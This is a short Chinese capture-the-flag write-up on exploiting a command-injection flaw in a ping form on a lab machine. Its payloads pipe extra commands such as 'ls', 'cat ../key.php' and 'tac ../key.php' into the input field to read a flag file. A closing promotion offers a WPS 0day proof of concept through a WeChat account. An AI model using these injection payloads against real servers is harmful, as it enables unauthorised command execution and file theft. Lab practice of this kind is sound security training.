url:http://192.168.154.253:84/ #打开http://XXX:81/,XXX为靶机的ip地址
审题
1、打开题目看到有一个提示,此题目需要通过利用命令执行漏洞执行Linux命令获取webshell,最后从根目录下key.php文件中获得flag
2、开始答题
第一步:测试命令执行漏洞点
1、传参 8.8.8.8 |
|
第二步:利用漏洞点拿到flag
猜测是执行了命令 ping 8.8.8.8 直接构建payload:ping 8.8.8.8 | ls 传参: 8.8.8.8 | ls |
应该是过滤了一些命令,换命令执行 执行语句: ping 8.8.8.8 | cat ../key.php 参数: 8.8.8.8 | cat ../key.php |
执行语句: ping 8.8.8.8 | tac ../key.php 参数: 8.8.8.8 | tac ../key.php |
猎杀时刻
目前在GG安全公众号中回复关键字"wps0day",即可获得wps打包套件及poc。
为了方便师傅们的交流学习,根据广大师傅们的建议,我在之后也会创建一个的群聊。预计在内部群内,我们将分享一些脱敏的漏洞报告和渗透测试实战案例,还将会有一些经验丰富的大牛和巨佬分享他们的经验。后续还将提供一些福利,例如送书和小礼物等等。欢迎师傅们到时候加入群聊,一起交流学习,致力打造一个有丰富学习氛围的小圈子。
公众号往期精彩内容(GG安全)